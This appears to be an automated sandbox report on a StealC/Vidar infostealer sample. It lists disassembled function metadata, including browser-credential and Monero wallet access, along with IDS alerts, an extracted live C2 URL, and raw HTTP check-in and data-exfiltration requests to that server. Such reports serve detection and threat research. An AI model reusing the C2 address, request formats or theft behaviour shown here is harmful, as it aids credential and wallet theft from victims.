Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: 1de8b8051e466e157458e6709848ab843546f7a8f52f3eeb10c7ea148228ca2e
Instruction ID: 6447bee7a96904001e8e085bd6f141eb5155f90b3ad7f7a511c0cde317460eb4
Opcode Fuzzy Hash: 1de8b8051e466e157458e6709848ab843546f7a8f52f3eeb10c7ea148228ca2e
Instruction Fuzzy Hash: A4E08CB1A41208BBC700DFD4DC0AE6D77B8EB44702F000095FD0AC7380DA719E019B92

Function 0089D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0142A240,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,01429018,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0089D481
lstrlen.KERNEL32(00000000), ref: 0089D698
lstrlen.KERNEL32(00000000), ref: 0089D6AC
DeleteFileA.KERNEL32(00000000), ref: 0089D72B

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 2b188451f148be3f0223f2f582d7a1ed8a161e9f8d1448a21ad245d1dbfc33ed
Instruction ID: e367c5349583af839e61fdeb309a84723bdae773c657d4e69e2d7daecae4112b
Opcode Fuzzy Hash: 2b188451f148be3f0223f2f582d7a1ed8a161e9f8d1448a21ad245d1dbfc33ed
Instruction Fuzzy Hash: AA91DF729101049AEB48FBA8DC96DEE7338FF15300F544169F517E6991EF386A09CB63

Function 008A3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 2ea586608609006f2ca55c9dd3130240d24fad94d06734e1b553553cd9efccba
Instruction ID: 0c963ff04a6cdd23cbdd3f88e1f80945ac4eb0c2828afccb90c6d654ee5936a6
Opcode Fuzzy Hash: 2ea586608609006f2ca55c9dd3130240d24fad94d06734e1b553553cd9efccba
Instruction Fuzzy Hash: A6414E71D10109ABEB08EFE4D885AFEB774FF55704F008018F516A6B90EB75AA05DFA2

Function 008A92E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(008A3AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,008A3AEE,?), ref: 008A92FC
GetFileSizeEx.KERNEL32(000000FF,008A3AEE), ref: 008A9319
CloseHandle.KERNEL32(000000FF), ref: 008A9327

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f8463df7b922e992aa932b231bce9591e48ad9777910c46d7fa152ffd554dc51
Instruction ID: aaac69a016235cbfc4c1faa1e937048604199ffba8edd75a71edaa06f071a71e
Opcode Fuzzy Hash: f8463df7b922e992aa932b231bce9591e48ad9777910c46d7fa152ffd554dc51
Instruction Fuzzy Hash: 9FF01935E44208ABEF10DBE0DC49B9E77B9FB58711F108294F652E76C0DA7096018B40

Function 008AC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 008AC74E

Part of subcall function 008ABF9F: __amsg_exit.LIBCMT ref: 008ABFAF

__getptd.LIBCMT ref: 008AC765
__amsg_exit.LIBCMT ref: 008AC773
__updatetlocinfoEx_nolock.LIBCMT ref: 008AC797

Memory Dump Source

Source File: 00000000.00000002.1895691567.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.1895669450.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1895691567.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896180748.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896487362.0000000000D8F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896629602.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1896650514.0000000000F2B000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: 20ff232e0137d05fa91946f5e91da378df7db31d713d0adfc463874aac72177c
Instruction ID: 30acf7560ca891cf1f63ef729c9911cea2d1823e7f9c4464c8eb4d1a0aad53cb
Opcode Fuzzy Hash: 20ff232e0137d05fa91946f5e91da378df7db31d713d0adfc463874aac72177c
Instruction Fuzzy Hash: CCF06D32901A149FF725BBBC580674933A0FF02720F244149F414E6AD3DFA45980DE97

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Source: 0.2.file.exe.890000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.890000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00899B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00899B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0089C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0089C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00899AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00899AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00897240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00897240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008A8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_008A8EA0

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAEGCGCGIEGDHIDHJJEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 36 36 31 38 30 33 42 32 46 32 34 32 30 33 32 35 35 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="hwid"4D2661803B2F2420325575------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="build"doma------DBAEGCGCGIEGDHIDHJJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHDHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="message"browsers------BFIDGDAKFHIEHJKFHDHD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBAHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="message"plugins------EHIIIJDAAAAAAKECBFBA--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="message"fplugins------HIEBAKEHDHCAKEBFBKEG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 185.215.113.37Content-Length: 6155Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAKKKJEHDBGIDHJKJDBFHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHCGDBFCBAKECBKKEBHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
